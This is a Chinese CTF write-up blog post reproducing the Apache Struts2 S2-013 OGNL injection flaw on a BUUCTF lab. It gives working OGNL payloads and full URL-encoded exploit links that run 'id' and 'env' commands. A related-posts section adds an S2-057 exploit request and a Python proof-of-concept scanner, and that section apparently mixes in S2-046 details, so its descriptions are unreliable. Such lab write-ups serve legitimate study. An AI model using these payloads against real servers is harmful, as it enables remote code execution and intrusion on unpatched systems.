[struts2]s2-013 漏洞复现

最新推荐文章于 2025-04-22 19:18:08 发布
最新推荐文章于 2025-04-22 19:18:08 发布
阅读量940 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全 CTF WEB安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/satasun/article/details/110938209
本文介绍 Struts2 S2-013 漏洞原理,涉及 <s:a> 和 <s:url> 标签的 includeParams 属性配置不当导致的任意命令执行漏洞。通过构造特定 URL 参数,实现远程代码执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[struts2]s2-013

环境搭建

github
buuctf

poc

在这里插入图片描述

Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下:
none - 链接不包含请求的任意参数值(默认)
get - 链接只包含 GET 请求中的参数和其值
all - 链接包含 GET 和 POST 所有参数和其值
<s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。在放置参数的过程中会将参数进行OGNL渲染,造成任意命令执行漏洞。

这里直接构造链接:
记得要先url编码:

${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close())}

// 或

${#_memberAccess["allowStaticMethodAccess"]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}

http://node3.buuoj.cn:29550/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27id%27).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

认准exec执行系统命令即可,flag在环境变量里面,构造:

http://node3.buuoj.cn:29550/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27env%27).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

在这里插入图片描述

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-013(CVE-2013-1966)
qq_51577576的博客
11-24 869
Struts2标签中和都包含一个includeParams属性,其值可设置为none、get 或 all,其对应意义分别为,none:链接不包含请求的任意参数值(默认),get:链接只包含GET请求中的参数和其值,all:链接包含GET和POST所有参数和其值.用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上.这个参数会进行OGNL表达式解析,从而可以插入任意OGNL表达式导致任意代码执行
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1854
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
S2-013的一次逐步复现分析
jary__D的博客
11-27 675
站在巨人的肩膀上,嚼烂了分析漏洞
360众测靶场题库之20-Apache Struts2远程代码执行漏洞(S2-013)
zjl12344的博客
03-07 351
360众测靶场题库
漏洞复现Struts2系列
最新发布
blackpeach的博客
04-22 805
Structs2系列:恶意的OGNL表达式 ,可造成 任意代码执行
struts2远程S2-013复现学习
hklearner的博客
04-02 389
S2-013复现 原理 struts2的标签中 和 都有一个 includeParams 属性,可以设置成如下值 none - URL中不包含任何参数(默认) get - 仅包含URL中的GET参数 all - 在URL中包含GET和POST参数 此时 或尝试去解析原始请求参数时,会导致OGNL表达式的执行 影响版本:Struts 2.0.0-2.3.14 漏洞搭建 Struts2 的标签<s:a>和<s:url>提供了一个 includeParams 属性。该属性的主要作用域
buuctf [struts2]s2-013
qq_1873822的博客
03-16 1047
漏洞简介 Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参.
BUUCTF-Real-[struts2]s2-013
分享
02-03 635
在s2-013中,因为参数的问题导致rce漏洞的出现!
墨者学院-Apache Struts2远程代码执行漏洞(S2-013)复现
JimWu的博客
09-04 2001
Apache Struts2远程代码执行漏洞(S2-013)复现 难易程度:★ 题目类型:命令执行 使用工具:FireFox浏览器、burpsuite 漏洞原理: s:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL...
0x19.Apache Struts2远程代码执行漏洞(S2-013)
qq_31679787的博客
09-27 451
通过构造payload执行命令; payload:%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2C%23b%3Dnew%20ja...
[漏洞复现]Apache Struts2/S2-013 (CVE-2013-1966)
k5664524的博客
01-17 1233
2.3.1.2 之前的 Apache Struts 允许远程攻击者绕过 ParameterInterceptor 类中的安全保护并执行任意命令。
Struts2远程代码执行漏洞分析(S2-0131
08-08
Struts2远程代码执行漏洞分析(S2-0131
K8_Struts2.3.1.4 s2-013 0day利用工具+动画
05-23
关于2010那洞 我就不说了 2011那个也不说了 (这两成功率 还是顶高的) s2-013 实战 鸡肋 (要不然这工具也不会丢出来了 最好你自己打个环境来测一下 免得你以为工具不能用) 触发条件 1 s2 架构 2 使用了s2的 a标签 3 includeParams=all <s:a includeParams="all">k8team</s:a> 在ie下看到的a标签 和普通html没啥区别 在firefox下会看到 使用了s2 a标签的链接源码是这样的 *.jsp;jsessionid inurl: *.jsp;jsessionid 能不能搞到 纯属看你人品了
Struts2 S2-046漏洞复现 (CVE-2017-5638)
1
05-27 4345
一:漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
Struts2 S2-046漏洞复现
2301_76467680的博客
07-09 878
在xb中间加个空格选中后改为00,再发包。修改filename参数。成功实现远程命令执行。
【Vulfocus解题复现Struts2 S2-013 Struts2 远程命令执行漏洞 (CVE-2013-1966)
温氏效应
09-04 3195
漏洞介绍 名称:Struts2 S2-013 远程命令执行漏洞 漏洞版本:Apache Group Struts 2.0.0 - 2.3.14 CVE标识符:CVE-2013-1966 描述:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL中包含get参数,all-在URL中同时包含get和post参数。当INCLUDEPa
Struts2 S2-013复现
ZJT6666666的博客
12-22 401
Struts2 S2-013复现
vulhub中Struts2-013/Struts2-014 远程代码执行漏洞复现
yougexiaojiuguan的博客
04-06 607
漏洞复现过程的记录
Apache Struts2远程代码执行漏洞(S2-013)复现
qq_36933272的博客
09-03 1813
查询原理:s:url和s:a标记都提供includeparams属性。 该属性的主要作用域是了解包含或不包含http://request参数的内容。 INCLUDEParams的允许值为: 无-在URL中不包含任何参数(默认) get-仅在URL中包含get参数 全部-在URL中同时包含get和post参数 包含精心设计的请求参数的请求可用于将任意ognl代码注入堆栈,随后用作URL或标记的请求参...
s2-057漏洞复现
03-19
### Struts2 S2-057 漏洞概述 Struts2 的 S2-057 漏洞主要源于其对多部分请求(multipart requests)处理不当,允许攻击者通过构造恶意的 Content-Disposition 头部来触发 OGNL 表达式的执行[^2]。此漏洞可能导致远程代码执行 (RCE),从而让攻击者完全控制目标服务器。 --- ### S2-057 漏洞复现环境准备 为了成功复现漏洞,需搭建如下测试环境: #### 1. **依赖组件** - Apache Struts2 版本:受影响版本为 2.3.x 前缀至 2.3.322.5.x 前缀至 2.5.10。 - Java 运行时环境 (JRE/JDK):建议使用 JDK 8 或更低版本以匹配当时的开发环境。 - Web 容器:Tomcat 是常用的容器之一。 #### 2. **配置文件调整** 确保 `struts.xml` 文件中启用了文件上传功能的相关设置: ```xml <interceptors> <interceptor-stack name="fileUploadStack"> <interceptor-ref name="defaultStack"/> <interceptor-ref name="fileUpload"/> </interceptor-stack> </interceptors> <action name="upload" class="com.example.UploadAction"> <interceptor-ref name="fileUploadStack"/> <result>/success.jsp</result> </action> ``` 上述配置表明应用支持文件上传操作,并可能暴露潜在风险。 --- ### S2-057 测试方法 以下是针对 S2-057 漏洞的具体测试流程: #### 1. 构造 HTTP 请求包 利用工具如 Burp Suite 发送自定义 POST 请求,其中包含恶意的 Content-Disposition 参数。例如: ```http POST /struts2-showcase/fileupload/upload.action HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------243620506915724 Content-Length: 253 -----------------------------243620506915724 Content-Disposition: form-data; name="foo"; filename="${@java.lang.Runtime@getRuntime().exec('calc')}" Content-Type: application/octet-stream test -----------------------------243620506915724-- ``` 在此示例中,`${}` 结构被用于嵌入 OGNL 表达式,尝试调用系统命令 `calc.exe` 来验证 RCE 能力。 #### 2. 验证漏洞效果 如果存在漏洞,则会观察到以下现象之一: - Windows 平台上弹出计算器窗口; - Linux/MacOS 上运行指定脚本或程序。 这证明了攻击者能够成功执行任意代码。 --- ### 编写自动化检测脚本 可以编写 Python 脚本来批量扫描是否存在此类漏洞。下面是一个简单的 PoC 实现: ```python import requests def test_s2_057(url, command='whoami'): headers = { 'User-Agent': 'Mozilla/5.0', 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary' } data = f'------WebKitFormBoundary\r\nContent-Disposition: form-data; name="foo"; filename="${{{"@".join(["@java", "lang", "Runtime@", "getRuntime()", ".exec(", repr(command), ")"])}}}"\r\nContent-Type: application/octet-stream\r\n\r\ntest\r\n------WebKitFormBoundary--' try: response = requests.post(url, headers=headers, data=data, timeout=10) if response.status_code == 200 and ('error' not in response.text.lower()): print(f"[+] Potential vulnerability detected at {url}") else: print(f"[-] No vulnerability found or error occurred.") except Exception as e: print(f"[!] Error during request: {e}") if __name__ == "__main__": target_url = input("Enter the URL to test: ").strip() test_s2_057(target_url) ``` 以上代码片段发送了一个带有特殊 payload 的 POST 请求给目标地址并解析响应结果判断是否有异常行为发生。 --- ### 总结 通过对 Struts2 S2-057 漏洞的学习可知,它属于典型的因输入校验不足引发的安全隐患案例。因此,在实际项目开发过程中应严格遵循最小权限原则以及充分的数据清洗机制防止类似问题再次出现。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值